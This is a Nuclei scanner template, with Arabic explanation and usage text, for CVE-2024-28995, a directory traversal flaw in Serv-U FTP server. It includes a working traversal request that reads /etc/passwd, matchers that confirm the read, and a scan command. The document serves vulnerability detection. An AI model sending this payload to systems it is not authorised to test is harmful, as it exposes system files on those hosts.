
قالب Nuclei للكشف عن CVE-2024-28995، وهو ثغرة اجتياز الدليل في خادم Serv-U FTP، مما يتيح قراءة الملفات عبر طلبات HTTP مصممة.
يتحقق من ثغرة اجتياز الدليل في إصدارات Serv-U 15.4.2 وما دون، والتي تسمح بقراءة الملفات الحساسة مثل /etc/passwd.
id: CVE-2024-28995
info:
name: Serv-U Directory Traversal Vulnerability
author: Hüseyin TINTAŞ
severity: high
description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
reference:
- https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
tags: pathtraversal,cve,high,serv-u
requests:
- method: GET
path:
- "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"
matchers-condition: and
matchers:
- type: word
words:
- "root:x:"
- "daemon:x:"
- "bin:x:"
part: body
- type: status
status:
- 200
- type: word
words:
- "Server: Serv-U"
part: header
لاستخدام هذا القالب مع Nuclei، احفظ محتوى القالب في ملف باسم وقم بتشغيل الأمر التالي:
CVE-2024-28995.yamlnuclei -t CVE-2024-28995.yaml -u <target-url>
استبدل <target-url> بعنوان URL للهدف الذي تريد مسحه.
للاستفسارات أو المعلومات الإضافية، يمكنك التواصل معي عبر: